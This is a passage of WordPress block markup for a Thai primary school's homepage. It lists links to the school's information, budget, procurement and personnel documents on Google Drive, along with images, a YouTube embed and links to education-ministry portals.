href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> - คู่มือฝ่ายบริหารงานบุคคล<br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" 